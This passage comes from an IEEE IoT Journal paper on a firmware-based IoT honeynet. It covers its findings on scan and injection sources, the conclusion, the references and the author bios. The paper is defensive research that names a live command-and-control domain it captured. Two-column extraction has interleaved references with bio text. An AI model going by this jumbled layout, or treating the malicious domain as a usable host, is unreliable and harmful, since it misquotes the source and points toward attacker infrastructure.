France interaction honeypot based on real firmware is designed.
USA Moreover, to expand the processing capability of the honeynet,
Italy
the multi-port honeypot is developed using the most exposed
SOAP service port in 2018, and we simulate different types of
IoT devices. Finally, the rapid deployment of the honeynet is
achieved by packaging the honeypot as a Docker image. The
honeynet system has been on stable operation for nearly half
a year in 2019, providing a large number of logs, malicious
samples, and other materials.
Fig. 6. Analysis for captured inject behaviors Owing to the timeliness of vulnerabilities, a necessity arises
to carry out ongoing track and research of IoT vulnerabilities,
security incidents, and analysis of hacker attacks. In terms
A total of 332 different IPs are observed to scan and of honeynet, the intelligence and automation of the system
inject the honeypot. As shown in Fig.5, the source IPs of require further strengthening as well as efficiency.
scan behaviors are shown, and the most scan behaviors are
from Japan. Fig.6 the distribution of countries for injecting R EFERENCES
behaviors, and most inject attacks are from the US. Nine IPs [1] Pa Y M P, Suzuki S, Yoshioka K, et al. IoTPOT: Analysing the Rise of
are identified in the suspect sample download center or C2 IoT Compromises. USENIX WOOT 2015. USENIX Association, 2015.
[2] Nguyen H T, Franke K. Adaptive Intrusion Detection System via Online
server found in the records, which are from different countries. Learning. International Conference on Hybrid Intelligent Systems. IEEE,
Apart from these IPs, the honeypot also captures a threat 2013:271-277.
domain named cnc.arm7plz.xyz. Fig.7 shows the distribution [3] Provos N. A Virtual Honeypot Framework. USENIX Security Sympo-
sium. 2004, 173(2004):1-14.
of these servers, and most servers are deployed in the USA. [4] Baecher P, Koetter M, Holz T, et al. The nepenthes platform: An
Honeypots download several IoT malicious samples from efficient approach to collect malware. International Workshop on Recent
these servers. These samples were not captured by VT during Advances in Intrusion Detection. Springer, Berlin, Heidelberg, 2006:
165-184.
capture, indicating that honeypots can capture the latest threats [5] Nepenthes Development Team. Dionaea. http://dionaea.carnivore.it/,
2011-05-15.
[6] Rist L, Vetsch S, Kossin M, et al. Know your tools: Glastopf-a dynamic,
low-interaction web application honeypot. The Honeynet Project, 2010,
Russia 4.
Japan [7] Honeywell project. Know Your Enemy: Learning about Security Threats.
USA Addison Wesley, 2004.
UK [8] Curran K, Morrissey C, Fagan C, et al. Monitoring hacker activity with
Italy a Honeynet. International Journal of Network Management, ACM, 2005,
15(2):123-134.
[9] Shuangshuang H. Honeynet-based attack analysis [D]. Beijing Univer-
sity of Posts and Telecommunications, 2015.
[10] Agrawal N, Tapaswi S. Wireless Rogue Access Point Detection Using
Shadow Honeynet. Wireless Personal Communications, Springer, 2015,
83(1):551-570.
[11] Pa Y M P, Suzuki S, Yoshioka K, et al. IoTPOT: A Novel Honeypot
for Revealing Current IoT Threats. Journal of Information Processing,
2016, 24(3):522-533.
[12] Anirudh M, Thileeban S A, Nallathambi D J. Use of honeypots for mit-
igating DoS attacks targeted on IoT networks. International Conference
Fig. 7. Sever distribution of malicious samples on Computer, Communication and Signal Processing. IEEE, 2017:1-4.

2327-4662 (c) 2019 IEEE. Personal use is permitted, but republication/redistribution requires IEEE permission. See http://www.ieee.org/publications_standards/publications/rights/index.html for more information.
This article has been accepted for publication in a future issue of this journal, but has not been fully edited. Content may change prior to final publication. Citation information: DOI 10.1109/JIOT.2019.2956173, IEEE Internet of
Things Journal
9

[13] Hakim M A, Aksu H, Uluagac A S, et al. U-PoT: A Honeypot Weizhe Zhang is currently a professor in the School
Framework for UPnP-Based IoT Devices. International Performance of Computer Science and Technology at Harbin
Computing and Communications Conference. IEEE, 2018: 1-8. Institute of Technology, China, and director in the
[14] Hanson P J, Truax L, Saranchak D D. IOT honeynet for military Cyberspace Security Research Center, Pengcheng
deception and indications and warnings. Autonomous Systems: Sensors, Laboratory, Shenzhen, China. His research interests
Vehicles, Security, and the Internet of Everything. International Society are primarily in cyberspace security, cloud comput-
for Optics and Photonics, 2018, 10643: 106431A. ing, and high-performance computing. He has pub-
[15] Yegneswaran V, Barford P, Paxson V. Using honeynets for internet lished more than 130 academic papers in journals,
situational awareness. Proceedings of the Fourth Workshop on Hot books, and conference proceedings. He is a senior
Topics in Networks. 2005: 17-22. member of the IEEE and a lifetime member of the
[16] Ma X, Zhu J, Wan Z, et al. Honeynet-based collaborative defense using ACM.
improved highly predictive blacklisting algorithm. World Congress on
Intelligent Control and Automation. IEEE, 2010: 1283-1288.
[17] Yongli L, Shufang W, Jie Z, et al. Model and evaluation of a new
Honeynet. IEEE Symposium on Robotics and Applications. IEEE, 2012:
574-576.
[18] Ghourabi A, Abbes T, Bouhoula A. Data analyzer based on data mining Bin Zhang received his Ph.D. degree in Department
for honeypot route. International Conference on Computer Systems and of Computer Science and Technology, Tsinghua
Applications. IEEE, 2010: 1-6. University, China in 2012. He worked as a post doc-
[19] Huang L, Zhu Q. Adaptive Honeypot Engagement through Reinforce- tor in Nanjing Telecommunication Technology Insti-
ment Learning of Semi-Markov Decision Processes. arXiv preprint tute from 2014 to 2017. He is now a researcher in the
arXiv:1906.12182, 2019. Cyberspace Security Research Center of Peng Cheng
[20] Dai G. Design and implementation on SOAP-based things management Laboratory. He publishes more than 30 papers in
protocol for internet of things. Proceedings of the World Congress on refereed international conferences and journals. His
Intelligent Control and Automation. IEEE, 2012: 4305-4308. current research interests focus on network anomaly
[21] Riedel T, Fantana N, Genaid A, et al. Using web service gateways and detection, Internet architecture, and its protocols,
code generation for sustainable IoT system development. Internet of network traffic measurement, information privacy
Things. IEEE, 2010: 1-8. security, etc.
[22] Baoyun Wang. Review of Internet of Things. Journal of Electronic
Measurement and Instruments,2009,23(12):1-7.
[23] Buchmann, Johannes, et al. High-Performance and Lightweight Lattice-
Based Public-Key Encryption. Proceedings of ACM International Work-
shop on IoT Privacy, Trust, and Security. ACM. 2016:2-9.
[24] Weber R H. Internet of Things – New security and privacy challenges. Ying Zhou received a bachelor’s degree in com-
Computer Law and Security Report, 2010, 26(1):23-30. puter science and technology from Dalian University
[25] Andrei C, Zaddach J, Francillon A, et al. A Large-Scale Analysis of of Technology In 2016, and a master’s degree in
the Security of Embedded Firmwares. Proceedings of Usenix Security computer science and technology from Harbin Insti-
Symposium, 2014:95-110. tute of Technology in 2019. She has been working
[26] Vasyltsov I, Lee S. Entropy extraction from bio-signals in healthcare IoT. in PengCheng Laboratory, Shenzhen, China since
Proceedings of the ACM Workshop on IoT Privacy, Trust, and Security. 2019.
ACM, 2015: 11-17.
[27] Zhu Y, Yan J, Tang Y, et al. Joint Substation-Transmission Line
Vulnerability Assessment Against the Smart Grid. IEEE Transactions
on Information Forensics and Security, 2017, 10(5):1010-1024.
[28] Fang Liu. A Brief Analysis of UPnP Agreement. Inner Mongolia Science
and Technology and Economy, 2009(17):72-73.
[29] Yu S, Gu G, Barnawi A, et al. Malware propagation in large-scale
networks. IEEE Transactions on Knowledge and data engineering. IEEE,
2014, 27(1):170-179.
Hui He is Ph.D. Supervisor in the School of Com-
[30] Yu S, Wang G, Zhou W. Modeling malicious activities in cyber space.
puter Science and Technology,Harbin Institute of
IEEE network. IEEE, 2015, 29(6):83-87.
Technology. She is a member of the IEEE, ACM and
[31] Yu S, Tian Y, Guo S, et al. Can we beat DDoS attacks in clouds?.
CCF. She conducts research in network and informa-
IEEE Transactions on Parallel and Distributed Systems, IEEE, 2013,
tion technology, big data processing and analysis and
25(9):2245-2254.
mobile network Computing. She has published more
[32] Medhane D V, Sangaiah A K. PCCA: position confidentiality con-
than fifty scientific papers. She has accomplished
serving algorithm for content-protection in e-governance services and
many projects such as National High Technology
applications. IEEE Transactions on Emerging Topics in Computational
Research and Development Program and National
Intelligence, IEEE, 2018, 2(3):194-203.
Science Foundation Projects.She has won 2 second
[33] Vishwasrao M D, Sangaiah A K. ESCAPE: effective scalable clustering
prizes Provincial Science and Technology Progress
approach for parallel execution of continuous position-based queries
Awards.
in position monitoring applications. IEEE Transactions on Sustainable
Computing, IEEE, 2017, 2(2):49-61.
[34] Sangaiah A K, Medhane D V, et al. Enforcing position-based confiden-
tiality with machine learning paradigm through mobile edge computing
in real-time industrial informatics. IEEE Transactions on Industrial
Informatics, IEEE, 2019, 15(7):4189-4196.
[35] Artail H, Safa H, Sraj M, et al. A hybrid honeypot framework for Zeyu Ding received a bachelor’s degree from Harbin
improving intrusion detection systems in protecting organizational net- Engineering University in 2017, and a master’s de-
works. computers & security, Elsevier, 2006, 25(4):274-288. gree from Harbin Institute of Technology in 2019.
[36] Oza A D, Kumar G N, Khorajiya M, et al. Snaring Cyber Attacks His research direction is cyberspace security.
on IoT Devices with Honeynet. Computing and Network Sustainability.
Springer, Singapore, 2019, 7: 1-12.
[37] Ammar Z, AlSharif A. Deployment of IoT-based honeynet model. Pro-
ceedings of the 6th International Conference on Information Technology:
IoT and Smart City. ACM, 2018: 134-139.

2327-4662 (c) 2019 IEEE. Personal use is permitted, but republication/redistribution requires IEEE permission. See http://www.ieee.org/publications_standards/publications/rights/index.html for more information.